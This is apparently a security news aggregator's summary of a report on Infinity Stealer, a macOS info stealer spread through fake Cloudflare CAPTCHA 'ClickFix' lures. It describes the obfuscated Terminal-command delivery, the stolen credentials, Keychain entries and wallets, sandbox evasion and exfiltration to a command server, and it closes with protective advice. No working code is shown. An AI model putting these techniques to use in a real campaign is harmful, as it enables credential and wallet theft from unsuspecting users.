CP
cyberpings
Malware & RansomwareHIGH

Infinity Stealer - New Malware Targets macOS Users

BCBleepingComputer+1 more
Infinity StealermacOSNuitkaClickFixinfo stealer
🎯

Basically, a new malware tricks macOS users into running harmful code to steal their data.

Quick Summary

Infinity Stealer malware is targeting macOS users through deceptive ClickFix lures. This malware steals sensitive data, posing a serious risk. Users must be cautious about executing unknown commands.

What Happened

A new malware named Infinity Stealer has emerged, specifically targeting macOS systems. This info-stealing malware employs a unique delivery method known as ClickFix, which mimics a Cloudflare human verification check. Users are tricked into executing malicious code by completing a fake CAPTCHA challenge. The malware is packaged as a Python executable using the Nuitka compiler, making it more difficult to analyze and detect.

Researchers at Malwarebytes have identified this as the first documented macOS campaign that combines ClickFix delivery with a Python-based infostealer. The use of Nuitka allows the malware to produce a native binary, which is more resistant to static analysis compared to traditional methods. This makes reverse engineering the malware significantly harder for security professionals.

Who's Being Targeted

The primary targets of Infinity Stealer are macOS users, particularly those who may not be aware of the risks associated with executing commands found online. The attack begins with a lure on the domain update-check[.]com, where users are misled into pasting a base64-obfuscated command into their macOS Terminal. This command bypasses OS-level defenses, allowing the malware to be installed without the user's knowledge.

Once the malware is installed, it can perform various malicious activities, including stealing sensitive data from the user’s system. The malware checks for certain conditions to ensure it is not running in a virtualized or sandboxed environment, further complicating detection efforts.

Signs of Infection

Once the Infinity Stealer malware is active, it can collect a range of sensitive information. This includes:

  • Credentials from Chromium-based browsers and Firefox
  • macOS Keychain entries
  • Cryptocurrency wallets
  • Plaintext secrets in developer files

The stolen data is exfiltrated via HTTP POST requests to a command-and-control server. Additionally, the threat actors receive notifications through Telegram once the data is successfully collected. Users may notice unusual activity or performance issues on their devices, but many may remain unaware of the infection.

How to Protect Yourself

To defend against threats like Infinity Stealer, users should exercise caution when executing commands found online. It is crucial to avoid pasting commands into the Terminal unless they are fully understood. Here are some recommended actions:

  • Use reputable antivirus software to detect and remove malware.
  • Regularly update macOS and applications to patch vulnerabilities.
  • Educate yourself about phishing techniques and the importance of verifying sources before executing commands.
  • Backup important data regularly to mitigate the impact of potential data loss.

The emergence of Infinity Stealer highlights an evolving threat landscape for macOS users, emphasizing the need for heightened awareness and proactive security measures.

🔒 Pro insight: The combination of ClickFix and Nuitka in this campaign signifies a shift towards more sophisticated macOS threats, complicating detection and response efforts.

Original article from

BCBleepingComputer· Bill Toulas
Read Full Article

Also covered by

BLBleepingComputer

New Infinity Stealer malware grabs macOS data via ClickFix lures

Read Article

Share

Related Pings

HIGHMalware & Ransomware

Malware - Cloudflare-Themed ClickFix Attack Targets Macs

A new ClickFix attack targets macOS users, delivering the Infiniti Stealer malware through a fake CAPTCHA page. This sophisticated method poses a serious risk to sensitive user data. Stay informed and protect your devices from these evolving threats.

SecurityWeek·
HIGHMalware & Ransomware

Malware - Backdoored Telnyx PyPI Package Distributes Threat

A backdoored Telnyx package on PyPI has been found to deliver malware hidden in WAV files. Developers must act fast to secure their systems and protect sensitive data. This incident highlights the ongoing risks associated with supply-chain attacks.

BleepingComputer·
HIGHMalware & Ransomware

Nation-State Malware - Dark Web Exploit Kits Exposed

Nation-state malware is now available on the Dark Web, threatening organizations everywhere. This trend makes it easier for attackers to exploit vulnerabilities. Companies need to step up their cybersecurity measures to stay safe.

Dark Reading·
HIGHMalware & Ransomware

Malware - TeamPCP Compromises Telnyx Versions on PyPI

TeamPCP has compromised the telnyx Python package on PyPI, pushing malicious versions to steal sensitive data. Developers must downgrade to a safe version immediately to protect their systems.

The Hacker News·
HIGHMalware & Ransomware

Malware - China Enhances BPFdoor for Global Telco Espionage

China's Red Menshen has upgraded its BPFdoor malware, posing a serious threat to telecoms worldwide. This advanced malware bypasses traditional defenses, making detection crucial. Telecom companies must enhance their security measures to combat this evolving threat.

Dark Reading·
HIGHMalware & Ransomware

Malware - TeamPCP Backdoors Telnyx PyPI Package Again

TeamPCP has backdoored the Telnyx SDK on PyPI, delivering malware through malicious packages. Developers using this SDK are at risk of sensitive data exposure. Immediate action is necessary to secure affected environments.

Help Net Security·